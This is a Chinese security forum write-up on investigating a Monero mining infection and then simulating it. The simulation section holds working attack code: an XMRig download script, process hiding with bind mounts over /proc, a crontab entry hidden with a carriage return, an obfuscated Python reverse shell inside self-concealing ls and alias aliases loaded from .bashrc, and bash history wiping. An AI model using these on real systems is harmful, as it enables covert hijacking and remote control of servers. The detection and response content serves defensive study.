问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
挖矿木马+隐藏后门应急分析
漏洞分析
记录一次挖矿病毒木马的学习,仅供学习交流 !
前言 == 记录一次挖矿病毒木马的学习,包含一下知识: - SSH 暴力破解 - 挖矿木马 (含流量分析) - Crontab 后门 - Alias 后门 应急响应 ==== 背景 -- 一天,客户反馈服务器莫名其妙突然卡顿、风扇狂转,但是查看 cpu 占用率却都不高,请你上机排查! 查看 cpu 占用率 ---------- ```php top -c ``` 但是发现 cpu 占用率都不高 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-2af6365fafdf065ec6e48bf37d213f7041d36cf6.png) 查看网络连接 ------ ```php netstat -anpt ``` ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-c1cf4ef04db568bd3910c3877227b7cd772f9cd0.png) 发现可以连接,IP:`43.129.150.140` 对该 ip 进行威胁情报关联分析,发现该 ip 被微步标记为矿池 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-e953ac69a0eb1ae3110eb996faf4375bdaa0baf4.png) 但是看不到进程信息,怀疑使用了目录挂载 解除目录挂载 ------ 查看所有目录挂载 ```php cat /proc/$$/mountinfo ``` ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-b18ce371bd8bce4141f973c0f912629aecfbdfb0.png) 发现可疑挂载,使用以下命令解除挂载 ```php umount /proc/59919 ``` 再次查看 cpu ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-fb777f35978964389b42b4b292b55d7f93658342.png) 查看网络连接 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-531f414e8f024e5e7b8904004057fe4b970a082d.png) 查看进程信息 ------ ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-400623bdf0a459cdcdc803dd5465caf20eebc255.png) 发现隐藏目录,包含恶意程序 计划任务 ---- 干掉恶意进程,并删除文件 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-eed18bce87f5344163caac51587a02273c2473ac.png) 查看 cpu 占用率正常 但是没过一会,服务器又开始卡顿、风扇狂转 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-eb1bcb0e8f7b01631bf3ec9d0e164cdfc5a7b3a3.png) 猜测存在计划任务,但是 `crontab -l` 命令没查到 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-b725b0907f128ce575a868702d76a8a837d994a7.png) 想到可能是隐藏了,解决: ```php cat -A /var/spool/cron/crontabs/root ``` ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-da3661e0778d1fdab76d9ed30527ebca86ee663d.png) 查看恶意脚本 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-26fe3b5b603dd2a4f0537513d61ec6648ef15265.png) 删除即可 隐藏后门 ---- 发现莫名其妙会出现一些外链的请求 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-b3416bb5f4385a0e947327d519d4ec01faed10c9.png) 查看历史命令业务异常 ```php history ``` 使用查看 `alias` 命令查看也无异常 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-f820be61e370489e447a734440b17e4a4ff94b12.png) 再一次连接之后排查 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-571c62522359cb77dbc607804a56f3005f0fbefd.png) 发现执行了一个恶意的 python 脚本 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-87fb21e7be9a515fa7b0c5f3446c280f06683b4a.png) 搜索后发现在 `release-upgrade` 文件,修改了 ls 命令 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-967e8ff1206e04016efe0f342cd7fc46716f8dd4.png) 发现 `.bashrc` 文件 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-0d76cc452e3bc6fc482c4dabfc51b579a9f61a58.png) 找一个初始的文件对比发现多了 5 行 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-60e42dd543689fcd9dad1948e7e9c5868027b8dc.png) 删除、删除 `release-upgrade` 文件、重启 XMR挖矿攻击模拟 ========= 模拟攻击流程 ------ ### SSH 爆破 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-615c9377fd05a791739dc558ec9f4010cd8bf18d.png) ### 上挖矿马 下载 ```php wget https://download.c3pool.org/xmrig_setup/raw/master/xmrig.tar.gz ``` 解压 ```php tar -zxvf xmrig.tar.gz ``` 解压后我们得到俩个文件,一个是 xmrig 主程序,一个是 config. Json 配置文件。 配置 输入:`vim config.json` 打开 config. Json 文件,将 YOUR\_WALLET\_ADDRESS 修改成你的钱包地址 ```php "user": "YOUR_WALLET_ADDRESS", "pass": "x", ``` 运行 ```php ./xmrig #后台启动 nohup ./xmrig & ``` ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-b926a3e593da364adab9eedf6a996921113935af.png) 进程隐藏 ---- ### 目录挂载 未隐藏之前 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-14367e33e5cae509f7a8eb27eb874424c2e24c82.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-db9efb925879b55062392c5d32ca727674852919.png) 目录挂载 ```php mkdir /tmp/.k/null mount --bind /tmp/.k/null /proc ``` ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-bfd9409e00139a1a45e8e421e973e164f2e2f9fe.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-fca4132b278f1a2a8fbfb41a8a77f454c95898fa.png) ### 计划任务 添加计划任务使其可以开机自启,删除后恢复 `1.sh` ```php #!/bin/bash if [ ! -f "/tmp/.k/xmrig" ]; then mkdir /tmp/.k cd /tmp/.k wget https://download.c3pool.org/xmrig_setup/raw/master/xmrig.tar.gz tar -zxvf xmrig.tar.gz sed -i 's/YOUR_WALLET_ADDRESS/45cuh6v7YDkdL9gTEkfffQ1rfoA6NitH9huwWUVjZnqCGXB9TrPGPK2D3UgLwMXtf1SCkNwuDNFZZWzCkgnesarBK9MDkJh/' /tmp/.k/config.json mkdir /tmp/.k/null nohup /tmp/.k/xmrig & fi sleep 3 if pgrep -x "xmrig" then pid=$(pgrep -x xmrig) mount --bind /tmp/.k/null /proc/$pid fi ``` `2.sh` ```php (crontab -l;printf "* * * * * /tmp/.s/1.sh;\rno crontw_wab for `whoami` %100 c\n")|crontab - ``` ```php #上传脚本运行 mkdir /tmp/.s cd /tmp/.s chmod 777 1.sh chmod 777 2.sh ./2.sh ``` 效果:`crontab -l` ,必须 `cat -A` 或者 `vim`、`vi` 才能看到 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-9dffd7e9f2122545538f64b953180dbd297820f8.png) 持久化后门 ----- `/etc/update-manager/` 目录下 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-3b76ddc68308cc86d68f4d61b344ec7d95cbc72b.png) 新建迷惑性文件 `release-upgrade` ```php touch release-upgrade ``` 放入恶意命令 ```php alias ls='alerts(){ ls $* --color=auto;python3 -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'\''UTF-8'\'')}[sys.version_info[0]]('\''aW1wb3J0IG9zLHNvY2tldCxzdWJwcm9jZXNzOwpyZXQgPSBvcy5mb3JrKCkKaWYgcmV0ID4gMDoKICAgIGV4aXQoKQplbHNlOgogICAgdHJ5OgogICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgcy5jb25uZWN0KCgiMTkyLjE2OC4xOTkuMSIsIDk5OTkpKQogICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgMCkKICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksIDEpCiAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAyKQogICAgICAgIHAgPSBzdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwgIi1pIl0pCiAgICBleGNlcHQgRXhjZXB0aW9uIGFzIGU6CiAgICAgICAgZXhpdCgp'\'')))";};alerts' alias unalias='alerts(){ if [ $# != 0 ]; then if [ $* != "ls" ]&&[ $* != "alias" ]&&[ $* != "unalias" ]; then unalias $*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};alerts' alias alias='alerts(){ alias "$@" | grep -v unalias | sed "s/alerts.*lambda.*/ls --color=auto'\''/";};alerts' ``` 追加进 `~/.bashrc` 文件 ```php #enable software update with apt #See /etc/apt/source.d/ in the apt package. if [ -f /etc/update-manager/release-upgrade ]; then . /etc/update-manager/release-upgrade fi ``` 清理痕迹 ---- ```php nl .bash_history sed -i '10,$d' .bash_history ``` XMR挖矿流量分析 ========= Stratum 协议 ---------- 矿池一般采用 Stratum 协议与挖矿主机进行交互通信,Stratum 协议是基于 JSON-RPC 2.0 封装的 TCP 通讯协议,在挖矿主机和矿池的交互过程中支持挖矿主机登记、任务下发、账号登录、结果提交和挖矿任务难度调整这五种行为。 XMR 挖矿流量分析 ---------- 由于比特币主机挖矿效益与投入比的不断降低,使得攻击者转向更具挖矿效率优势的门罗币。门罗币可以使用 CPU 或 GPU 进行挖矿,具有隐蔽性强,灵活性高等特点,是挖矿木马的首选,平常实际遇见的挖矿木马挖取的加密货币也几乎都是门罗币。 **其采用 jsonrpc 数据样例的格式进行通信** ### 安装 tcpdump ```php apt-get install tcpdump ``` ### 捕获数据包 捕获前 10000 个经过 ens 33 接口的数据包: ```php tcpdump -i ens33 -c 10000 -nn -w xmr_capture.pcap ``` ### 过滤分析 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-731a31810aa781b6cd2c26069f6e4d92919472cb.png) XMR 采用 Cryptonight 算法作为其工作量证明的哈希函数。当使用 XMRig 进行挖矿时,他所采用的 CryptoNight 算法可能会产生较多的网络流量,因为它需要频繁地与矿池通信以获取新的挖矿任务。各种挖矿程序在使用 Stratum 协议的数据格式都会稍有不同,包括 XMRig。但是它们都遵循 JSON-RPC 2.0 的规范。 #### 矿机任务提交 这个就是 XMRig 挖矿客户端向矿池服务器提交挖矿工作的请求 ```json { "id": 121, "jsonrpc": "2.0", "method": "submit", "params": { "id": "50465107", "job_id": "51650811", "nonce": "cc210000", "result": "374de8..." } } ``` #### 矿池的成功响应 机矿成功提交挖矿工作后由矿池返回 ```json { "jsonrpc": "2.0", "id": 110, "error": null, "result": { "status": "OK" } } ``` #### 矿池下发新任务 ```json { "method": "job", "params": { "blob": "1010a5...", "algo": "rx/0", "height": 3190425, "seed_hash": "78f693...", "job_id": "51724435", "target": "7d770100", "id": "50465107" }, "jsonrpc": "2.0" } ``` ### 总结 总的来说特征还是很明显的,基于 json 的流量,主要特征字段有 id,jsonrpc,method,params,job\_id,nonce,result 等 参考 == <https://wxiaoge.blog.csdn.net/article/details/117472195> <https://blog.csdn.net/laozhang338/article/details/131812201> <https://www.cnblogs.com/smileleooo/p/18172605#%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90>
发表于 2024-07-25 09:00:01
阅读 ( 3553 )
分类:
应急响应
11 推荐
收藏
0 条评论
请先
登录
后评论
Yu9
9 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!